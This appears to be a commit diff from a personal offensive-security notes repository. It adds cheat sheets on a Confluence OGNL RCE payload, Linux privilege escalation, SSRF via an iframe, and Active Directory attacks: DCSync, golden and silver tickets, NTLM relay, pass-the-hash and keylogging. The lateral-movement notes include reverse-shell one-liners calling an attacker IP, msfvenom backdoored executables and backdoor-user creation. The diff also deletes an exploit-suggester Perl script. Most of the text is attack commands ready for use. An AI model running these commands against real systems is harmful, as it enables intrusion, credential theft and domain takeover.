whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

AD stuff

This commit is contained in:
Stefan Friese 2022-07-06 22:49:06 +02:00
parent c613e1d12d
commit bf6d08e15d
12 changed files with 643 additions and 707 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
exploit/java/OGNL/cve_2022_26134.md Normal file
View File

@ -0,0 +1,23 @@
# CVE-2022-26134
* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
* Confluence versions:
* 1.3.0 to 7.4.17
* 7.13.0 to 7.13.7
* 7.14.0 to 7.14.3
* 7.15.0 to 7.15.2
* 7.16.0 to 7.16.4
* 7.17.0 to 7.17.4
* 7.18.0 to 7.18.1
* Object Graph Navigation Language (OGNL)
## Usage
* Payload is a GET request which is set via the URI
```sh
${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
```
* URL encode and curl for PoC
* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)

3
exploit/linux/groups.md Normal file
View File

@ -0,0 +1,3 @@
# Groups
* [steflan-security](https://steflan-security.com/linux-privilege-escalation-exploiting-user-groups/)

13
exploit/linux/setcap.md Normal file
View File

@ -0,0 +1,13 @@
# setcap
* Set capabilities of a binary
* [Hacktrick's setuid page](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/euid-ruid-suid)
## Usage
* If there is an S-bit or sudo on setcap do the following. Copy python binary and
```sh
setcap cap_setuid+ep /absolute/path/to/copied/python3
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
```

14
exploit/linux/sudo/tokens.md Normal file
View File

@ -0,0 +1,14 @@
# Reusing Sudo Token
* Reuse sudo token of currently logged in user
* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
* `ptrace` has to be fully enabled
```sh
cat /proc/sys/kernel/yama/ptrace_scope
0
```
* sudo has to be triggered the last 15 minutes, check `ps wuax`
* `gdb` has to be installed
* One must be logged in as the same user which should be owned
* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)

22
exploit/web/ssrf/iframe.md Normal file
View File

@ -0,0 +1,22 @@
# SSRF through iframe
* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
```php
<?php
$loc = "http://127.0.0.1/";
if(isset($_GET['a'])){
$loc = $_GET['a'];
}
header('Location: '.$loc);
?>
```
* Payload looks like this
```html
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
```
* Start a php adhoc server and run it
```php
php -S 0.0.0.0:4711
```

12
misc/active_directory/AD_CS.md
View File

@ -10,7 +10,7 @@
## Certificate Templates
* Extended/Enhanced Key Usage
* Extended/Enhanced Key Usage (EKU)
* Parameter combination can be exploited
* User Certificates may be requested from a member of a Domain User Group
* Machine Certifcates may be requested from a host of a Domain Computer Group
@ -43,7 +43,7 @@ Exploitable templates should have the following traits:
* On the machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
```sh
@ -51,6 +51,14 @@ Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path
```
* `runas /user:<domain>\<username of DA> cmd.exe`
* Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
```sh
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
```
## CVE-2022-26923
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions

183
misc/active_directory/ad_misconfiguration.md Normal file
View File

@ -0,0 +1,183 @@
# Active Directory Misconfigurations
## Permission Delegation
* Permissions to functions may be delegated as a standard functions itself
* Privilege creep becomes a problem eventually
* Discretionary ACLs are controlled by Access Control Entries (ACEs)
### The following ACEs are critical and prone to be exploited
* __GenericAll__, complete control and creation of an object
* __ForceChangePassword__, change the password of a user and sometimes administrator passwords
* __AddMembers__, add a user to an existing group
* __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts.
* __WriteOwner__, change owner of a target object.
* __WriteDACL__, create new ACEs to an object's DACL
* __AllExtendendRights__ all control over an object's permission
### Tools to exploit ACEs
* AD-RSAT
* Powersploit
* BloodHound, check permissions to target
### Usage
* Add user to a group via powershell
```sh
Add-GroupMember "<GroupName>" -Members "<username>"
```
* List info about groups, preferably administration groups
```sh
Get-ADGroupMember -Identity "<GroupName>"
```
* Set new password for user, afterwards reconnect session
```sh
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
```
## Kerberos Delegation
* Unconstrained (without limit) delegation, [exploit](https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976)
* Constrained delegation
* Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
### Delegatable Services
* __HTTP__
* __CIFS__
* __LDAP__
* __HOST__
* __MSSQL__
### Usage
* Enumerate via powerview
```sh
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
```
## Automated Relays
### Machine Accounts
* Administrative machine account of one host having administrative permissions over another host
### Printers
* Target has to have an SMB server
* Spooler, PetitPotam, PrintNightmare are printer exploits
* Query printer services through a servers domain
```sh
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
```
* SMB signing may be enabled but must not be enforced in order for the exploit to work, check via
```sh
nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
```
* Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
```
* Authenticate on attacker with the credentials already gained from a windows computer
```sh
SpoolSample.exe <domain> "$ATTACKER_IP"
```
* Authenticate with the received credential
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
```
## Active Directory Users
### Credentials
### Keylogging
* With a meterpreter shell migrate to an active user's process and set a keylogger
```sh
migrate <processID>
keyscan_start
```
* To inspect the results
```sh
keyscan_dump
```
## Group Policy Objects
* Every `GPO` has a `GUID`
* Local Policies are configured for application rules for FW, Windows-Defender, Applocker
* Other local policies are group memberships, startup config, protocols
* Group policies change configuration of these remotely over AD
* `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain
### Usage
* Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
* Start a `cmd` with a AD user and execute `mmc` through it
```sh
runas /netonly /user:<domain>\<username> cmd.exe
mmc
```
* Check connection of the `cmd.exe` via
```sh
dir \\<domain>\sysvol
```
* Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK`
* On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `<domain>` -> `Server` -> `Management Servers` and right click to edit the group
* On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups
## Certificates
* [AD Certificate Services](./AD_CS.md)
## Domain Trusts
* Domain Trusts offer access to resources to users in the domain
* Directional, from trusted domain to another truster domain
* Transitive, beyond more than just one other domain
* Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
* `krbtgt` as an account signs and encrypts TGTs
* Crafting a golden ticket by becoming a TGS. Following info is needed
* FQDN
* Security identifier of the domain (SI)
* Target's username
* __KRBTGT password hash__ store on the DC
### Usage
* `KRBTGT` via Mimikatz, resulting in `Hash NTLM`
```sh
privilege::debug
lsadump::dsync /user:<username\kbtgt>
```
* Craft the ticket with the help of this hash
* Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21-<RootDomain>-519`
* SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
* Get child SIDs via
```sh
Get-ADComputer -Identity "<DCChildCN>"
```
* Get parent SID via
```sh
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
```
* Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz
```sh
privilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$
```

52
misc/active_directory/ad_persistence.md Normal file
View File

@ -0,0 +1,52 @@
# Active Directory Persistance
## Using Credentials
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
* Credentials for multiple local administrators
* Service account with delegation permissions
* __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)
### Usage
* Use mimikatz
```sh
lsadump::dcsync /domain:<domain> /user:<username>
```
* To query the krbtgt user
```sh
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
```
* Query everything
```sh
lsadump::dcsync /domain:<domain> /all
```
## Using Tickets
* __Golden Ticket__ crafted TGT,
* Needs domain name, domain SID and a user ID to impersonate
* Needs krbtgt NTLM to sign the ticket
* krbtgt hash never rotates automatically, only refreshed manually
* krbtgt hash bypasses smart cards
* TGT can not be older than 20 minutes
* TGT lifetime can be set to years
* TGT can be signed anywhere as long as the krbtgt hash is known
* __Silver Ticket__ crafted TGS
* Signed by targeted service account on a host
* DC is never contacted, no contact to any TGT or KDC
* Non existing user can be used with a local admin group's SID
### Usage
* Craft a golden ticket
```sh
Get-ADDomain
```
```sh
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```

264
misc/active_directory/lateral_movement.md Normal file
View File

@ -0,0 +1,264 @@
# Lateral Movement
* Finding credentials with more permissions move through the network cloaked, avoiding detection
* Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
* Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts
* __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service`
## Remote Processes
### psexec
* Port `445`
* `SMB` protocol
* Group membership: `Administrators`
* Upload the service binary to `ADMIN$` directory of the SMB server
* Use `psexesvc.exe` via service control manager to execute the remote process
* Communication will be established through a named pipe
```sh
psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
```
### WinRM
* Ports `5985` (HTTP) and `5986` (HTTPS)
* Group Membership: `Remote Management Users`
* Execute powershell commands on remote targets
```sh
winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
```
* Run through powershell alternatively via
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}
```
### sc
* Ports `135`, `49152-65535` (DCE/RPC), `135` shows service endpoints on the high ports
* Ports `139` and `445`RPC over SMB named pipes, if SVCCTL fails over `135`
* Group Membership: `Administrators`
* Create service remotely via Service Control Manager (RPC) or `SVCCTL`
```sh
sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService
sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService
```
### schtasks
* Create remote scheduled tasks
```sh
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService"
```
* Delete scheduled tasks via
```sh
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
```
### wmi
* Ports are
* DCOM `135` RPC and dynamic ports
* Wsman `5985` winrm HTTP and `5986` winrm HTTPS
* Group membership: `Administrators`
* To start, use the same object used for winrm
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
```
* Store the session
```sh
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
```
* __Spawn a remote process__
```sh
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
```
* Alternatively via
```sh
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%"
```
* __Spawn a remote service__
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "SteamUpdateService";
DisplayName = "SteamUpdateService";
PathName = "net user gabenewell securepassword /add";
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
```
* Initiate the service
```sh
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
```
* Start and stop via
```sh
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
```
* __Spawn a remote scheduled task__
```sh
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* Delete task via
```sh
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* __ Install a remote msi package__
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
```
* Upload and run via
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
```
* Alternatively on older systems via
```sh
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
```
## Further Authentication Methods
* NTLM
* Kerberos
### NTLM
#### __Pass the hash__
* Retrieve and pass a hash generated from the password
* Use mimikatz on local SAM
```sh
privilege::debug
token::elevate
lsadump::sam
```
* Use mimikatz on lsass
```sh
privilege::debug
token::elevate
sekurlsa::msv
```
* Open reverse shell via mimikatz
```sh
token::revert
sekurlsa::pth /user:<username>
/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```
* Via RDP
```sh
xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
```
* Via psexec
```sh
psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
```
* Kerberos
```sh
evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>
```
### Kerberos
* Ticket and session key are needed
#### Pass The Ticket
* Extract via mimikatz
```sh
privilege::debug
sekurlsa::tickets /export
```
* TGS need low privilege account, TGT need administrative privileges
* Use the ticket to inject into a current session
```sh
kerberos::ptt <ticket>@<domain>.kirbi
```
* Check tickets via `klist`
#### Overpass The Hash
* Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
* Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled
* `rc4` is a pure ntml hash
* Use the key to gain the TGT
```sh
privilege::debug
sekurlsa::ekeys
```
* Open a reverse shell via
```sh
sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```
## Writeable Shares
* Find a shortcut, a script or anything that keeps a connection over the network to a share
* Reuse a `*.vbs` via
```sh
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
```
* Reuse and inject into exisiting portable executable
```sh
msfvenom -a x64 --platform windows -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
```
* Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name
```sh
PsExec64.exe -s cmd.exe
query user
```
* Check output and fill in
```sh
tscon <ID-of-target> /dest:<my-SESSIONNAME>
```
* Session state should be `DISC`, a session which was not exited correctly
* Windows Server < 2019 only without the password

58
pivoting.md
View File

@ -10,7 +10,8 @@
* `/etc/resolv.conf`
* `ipconfig /all`
* `nmcli dev show`
### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
### Scripting Techniques
```sh
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
@ -19,17 +20,25 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
* Using local tools through a proxy like `nmap`
## Tools
### Enumerating a network using native and statically compiled tools
* Enumerating a network using native and statically compiled tools
### Proxychains / FoxyProxy
* Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server
* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
```sh
ssh <username>@$ATTACKER_IP -R 9050 -N
```
* Proxychains, e.g. scan target via nmap, or connect via nc through jump server
```sh
proxychains nc <IP> <PORT>
proychains nmap <IP>
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
proxychains wget http://$TARGET_IP:8000/loot.zip
```
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
```
```sh
[ProxyList]
# add proxy here ...
# meanwhile
@ -41,18 +50,29 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
* FoxyProxy, choose proxy type, proxy IP and port in settings
### SSH port forwarding and tunnelling (primarily Unix)
* LocalPortForwarding
```sh
ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
```
* Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`. One can connect now to the target via the jumpserver
* Tip: open port on windows target via
```sh
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
```
* Dynamic Port Forwarding
```sh
ssh -D <Port> <user>@<Jumpserver> -fN
ssh -D $PORT <user>@<Jumpserver> -fN
```
* Reverse Proxy
* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
```sh
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
```
* Tip1: create a user on the attacker to receive the connection without compromising your own password
* Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target
### plink.exe (Windows)
* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
```sh
@ -68,6 +88,7 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
```
### Socat
* Reverse shell on target via
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
@ -76,10 +97,12 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
```sh
sudo nc -lvnp 443
```
* Relay via Jumpserver
* Relay on jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding
* On attacker
```sh
@ -90,8 +113,14 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
* In need of a Download on target, expose a port on the attacker via relay
```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
```
### Chisel
* **Does not require SSH on target**
* Reverse Proxy
@ -151,7 +180,7 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
* Exclude servers via `-x`, for example the target/gateway server
### Meterpreter
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do
```sh
portfwd add -l 22 -p 22 -r 127.0.0.1
```
@ -173,4 +202,13 @@ run
```sh
use auxiliary/server/socks_proxy
```
* Set proxychain on attacker accordingly
### rpivot
* [klsecservices' repo](https://github.com/klsecservices/rpivot.git)
* [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0)
## Links
* [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)

12
post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
View File

@ -7,6 +7,7 @@
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [privescheck](https://github.com/itm4n/PrivescCheck)
* [windows exploit suggester](https://github.com/bitsadmin/wesng)
* [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)
## Account Types
@ -38,7 +39,7 @@ qwinsta
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
* Installed software, check for existing exploits
```sh
wmic product get name,version,vendor
```
@ -263,7 +264,16 @@ copy cmd.exe utilman.exe
```
* Log out, on the Login screen click on `Ease of Access`
#### SeImpersonate / SeAssignPrimaryToken
* It is a rouge potato
* Execute process as another user
* Service accounts operate through impersonation
* Check privileges via `whoami /priv` for these
* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
```sh
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
```
* Catch the potatoe executable from target via netcat

694
post_exploitation/priv_esc/kernel-exploits/linux-exploit-suggester-2/smokey@10.10.157.16
View File

@ -1,694 +0,0 @@
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;
our $VERSION = '2';
my %opts;
getopts( 'k:hd', \%opts );
if (exists $opts{h}) {
usage();
exit;
};
print_banner();
my ( $khost, $is_partial ) = get_kernel();
print " Local Kernel: \e[00;33m$khost\e[00m\n";
my %exploits = get_exploits();
print ' Searching ' . scalar keys(%exploits) . " exploits...\n\n";
print " \e[1;35mPossible Exploits\e[00m\n";
my $count = 1;
my @applicable = ();
EXPLOIT:
foreach my $key ( sort keys %exploits ) {
foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {
if ( $khost eq $kernel
or ( $is_partial and index($kernel,$khost) == 0 )
) {
$exploits{$key}{key} = $key;
push(@applicable, $exploits{$key});
print " \e[00;33m[\e[00m\e[00;31m$count\e[00m\e[00;33m]\e[00m ";
print "\e[00;33m$key\e[00m";
print " \e[00;33m($kernel)\e[00m" if $is_partial;
my $alt = $exploits{$key}{alt};
my $cve = $exploits{$key}{cve};
my $mlw = $exploits{$key}{mil};
if ( $alt or $cve ) {
print "\n";
}
if ( $alt ) { print " Alt: $alt "; }
if ( $cve ) { print " CVE-$cve"; }
if ( $mlw ) { print "\n Source: $mlw"; }
print "\n";
$count += 1;
next EXPLOIT;
}
}
}
print "\n";
if (!@applicable) {
print " No exploits are available for this kernel version\n\n";
exit;
}
if (exists $opts{d}) {
print " \e[1;36mExploit Download\e[00m\n";
print " (Download all: \e[00;33m'a'\e[00m / Individually: \e[00;33m'2,4,5'\e[00m ";
print "/ Exit: \e[00;33m^c\e[00m)\n";
print " Select exploits to download: ";
while (1) {
my $input = <STDIN>;
$input =~ s/\s+//g;
if ($input =~ /^a$/) {
my @selected = ();
for (my $i=1; $i <= scalar @applicable; $i++) {
push(@selected, $i);
}
download_exploits(\@selected, \@applicable);
last;
}
elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
my @selected = uniq(split(',', $input));
@selected = sort {$a <=> $b} @selected;
if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
download_exploits(\@selected, \@applicable);
last;
}
else {
print " \e[00;31mInput is out of range.\e[00m Select exploits to download: ";
}
}
else {
print " \e[00;31mInvalid input.\e[00m Select exploits to download: ";
}
}
};
exit;
######################
## extra functions ##
######################
sub get_kernel {
my $khost = '';
if ( exists $opts{k} ) {
$khost = $opts{k};
}
else {
$khost = `uname -r |cut -d"-" -f1`;
chomp $khost;
}
if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
print " \e[00;31mSpecified kernel is in the wrong format\e[00m\n";
print " Try a kernel format like this: 3.2.0\n\n";
exit;
}
# partial kernels might be provided by the user,
# such as '2.4' or '2.6.'
my $is_partial = $khost =~ /^\d+\.\d+\.\d?/ ? 0 : 1;
return ( $khost, $is_partial );
}
sub download_exploits {
my ($sref, $aref) = @_;
my @selected = @{ $sref };
my @applicable = @{ $aref };
my $exploit_base = "www.exploit-db.com/exploits";
my $download_base = "https://www.exploit-db.com/raw/";
print "\n";
foreach my $num (@selected) {
my $mil = $applicable[$num-1]{mil};
next if (!defined $mil);
my ($exploit_num) = ($mil =~ /^.*\/([1-9][0-9]*)\/?$/);
if ($exploit_num && index($mil, $exploit_base) != -1) {
my $url = $download_base . $exploit_num;
my $file = "exploit_$applicable[$num-1]{key}";
print " Downloading \e[00;33m$url\e[00m -> \e[00;33m$file\e[00m\n";
system "wget $url -O $file > /dev/null 2>&1";
}
else {
print " No exploit code available for \e[00;33m$applicable[$num-1]{key}\e[00m\n";
}
}
print "\n";
}
sub uniq {
my %seen;
grep !$seen{$_}++, @_;
}
sub usage {
print_banner();
print " \e[00;35mUsage:\e[00m $0 [-h] [-k kernel] [-d]\n\n";
print " \e[00;33m[\e[00m\e[00;31m-h\e[00m\e[00;33m]\e[00m Help (this message)\n";
print " \e[00;33m[\e[00m\e[00;31m-k\e[00m\e[00;33m]\e[00m Kernel number (eg. 2.6.28)\n";
print " \e[00;33m[\e[00m\e[00;31m-d\e[00m\e[00;33m]\e[00m Open exploit download menu\n\n";
print " You can also provide a partial kernel version (eg. 2.4)\n";
print " to see all exploits available.\n\n";
}
sub print_banner {
print "\n\e[00;33m #############################\e[00m\n";
print "\e[1;31m Linux Exploit Suggester $VERSION\e[00m\n";
print "\e[00;33m #############################\e[00m\n\n";
}
sub get_exploits {
return (
'w00t' => {
vuln => [
'2.4.10', '2.4.16', '2.4.17', '2.4.18',
'2.4.19', '2.4.20', '2.4.21',
]
},
'brk' => {
vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
},
'ave' => { vuln => [ '2.4.19', '2.4.20' ] },
'elflbl' => {
vuln => ['2.4.29'],
mil => 'http://www.exploit-db.com/exploits/744',
},
'elfdump' => { vuln => ['2.4.27'] },
'elfcd' => { vuln => ['2.6.12'] },
'expand_stack' => { vuln => ['2.4.29'] },
'h00lyshit' => {
vuln => [
'2.6.8', '2.6.10', '2.6.11', '2.6.12',
'2.6.13', '2.6.14', '2.6.15', '2.6.16',
],
cve => '2006-3626',
mil => 'http://www.exploit-db.com/exploits/2013',
},
'kdump' => { vuln => ['2.6.13'] },
'km2' => { vuln => [ '2.4.18', '2.4.22' ] },
'krad' =>
{ vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },
'krad3' => {
vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
mil => 'http://exploit-db.com/exploits/1397',
},
'local26' => { vuln => ['2.6.13'] },
'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },
'mremap_pte' => {
vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
mil => 'http://www.exploit-db.com/exploits/160',
},
'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
'ong_bak' => { vuln => ['2.6.5'] },
'ptrace' =>
{ vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
'ptrace_kmod' => {
vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
cve => '2007-4573',
},
'ptrace_kmod2' => {
vuln => [
'2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
'2.6.32', '2.6.33', '2.6.34',
],
alt => 'ia32syscall,robert_you_suck',
mil => 'http://www.exploit-db.com/exploits/15023',
cve => '2010-3301',
},
'ptrace24' => { vuln => ['2.4.9'] },
'pwned' => { vuln => ['2.6.11'] },
'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
'raptor_prctl' => {
